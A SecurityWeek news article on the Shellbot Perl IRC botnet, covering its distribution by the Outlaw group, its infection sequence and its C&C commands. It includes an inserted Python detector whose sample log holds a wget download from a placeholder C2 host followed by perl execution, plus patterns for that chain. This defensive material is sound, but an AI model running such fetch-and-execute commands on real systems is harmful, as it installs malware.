
Shellbot Botnet Targets Linux, Android Devices

An IRC bot written in Perl is targeting Internet of Things (IoT) devices and Linux servers, but can also affect Windows systems and Android devices, Trend Micro warns.

Dubbed Shellbot, the malware is being distributed by a threat group called Outlaw, which recently compromised FTP servers of a Japanese art institution and a Bangladeshi government site. The hackers linked compromised servers to a high availability cluster to host an IRC bouncer and control the botnet.

Previously, the botnet was being distributed via an exploit targeting the ShellShock vulnerability, hence its name. Last month, IBM observed attacks targeting the Drupalgeddon2 vulnerability (CVE-2018-7600) to distribute the botnet.

The campaign Trend Micro’s security researchers investigated, however, leveraged previously brute-forced or compromised hosts for distribution purposes. The bot was observed targeting Ubuntu and Android devices.

By looking at the botnet’s command and control (C&C) traffic, the security researchers found the IRC channel’s information and discovered around 142 hosts in the channel at the time of the first infection.

To infect hosts, the malware first runs a command on the target to verify that it accepts commands from the command-line interface (CLI). Next, the working directory is changed to “/tmp” and the downloaded payload is run with the Perl interpreter. The payload is removed in the final step.
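The infection steps above (change to /tmp, fetch a payload, run it with perl, delete it) form an ordered chain that a defender can look for in shell or process-execution logs. The following is an added example, not code from Trend Micro or SecurityWeek; the log line format, host names and the placeholder C2 URL are constructed for illustration.

```python
import re

# Constructed sample events in a hypothetical "<epoch> <host> <command>" format.
# web01 reproduces the chain the article describes; db01 and web02 are benign noise.
SAMPLE_EVENTS = """\
1540000001 web01 uname -a
1540000002 web01 cd /tmp
1540000003 web01 wget -q http://C2-PLACEHOLDER.invalid/payload -O .x
1540000004 web01 perl .x
1540000005 web01 rm -f .x
1540000010 db01 cd /tmp
1540000011 db01 ls -la
1540000020 web02 perl /opt/app/cron.pl
"""

# Ordered stages of the chain; each regex is matched against the command text.
STAGES = [
    ("cd_tmp", re.compile(r"^cd\s+/tmp\b")),
    ("fetch", re.compile(r"^(wget|curl)\b")),
    ("perl_run", re.compile(r"^perl\b")),
    ("cleanup", re.compile(r"^rm\b")),
]

def parse_events(text):
    """Split raw log text into (timestamp, host, command) tuples."""
    events = []
    for line in text.splitlines():
        ts, host, cmd = line.split(" ", 2)
        events.append((int(ts), host, cmd))
    return events

def find_shellbot_chains(text, window=60):
    """Return {host: start_ts} for hosts where all STAGES occur in order within `window` seconds."""
    per_host = {}
    for ts, host, cmd in parse_events(text):
        per_host.setdefault(host, []).append((ts, cmd))
    hits = {}
    for host, cmds in per_host.items():
        stage, start = 0, None
        for ts, cmd in cmds:
            if start is not None and ts - start > window:
                stage, start = 0, None  # chain went stale; look for a fresh start
            if STAGES[stage][1].search(cmd):
                if stage == 0:
                    start = ts
                stage += 1
                if stage == len(STAGES):
                    hits[host] = start
                    break
    return hits

if __name__ == "__main__":
    print(find_shellbot_chains(SAMPLE_EVENTS))  # {'web01': 1540000002}
```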

Once the Shellbot backdoor is up and running on the infected system, the IRC channel’s administrator can send commands to the host, to perform a port scan and various forms of distributed denial of service (DDoS), to download a file, get information about other machines, or send operating system (OS) information and a list of certain running processes.

The security researchers also discovered that the attackers would often modify the contents of the files hosted on the C&C server. The modification, deletion and addition of files mostly happened during daytime in Central European Time (CET), but never at night or on weekends.

The use of an IRC bot isn’t a novel tactic, especially with the code used in these attacks being available online, Trend Micro notes. The operation targeted big companies, but the group hasn’t engaged in widespread attacks, the security researchers also point out.

Related: Hackers Exploit Drupalgeddon2 to Install Backdoor

Related: New Virobot Ransomware and Botnet Emerges

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
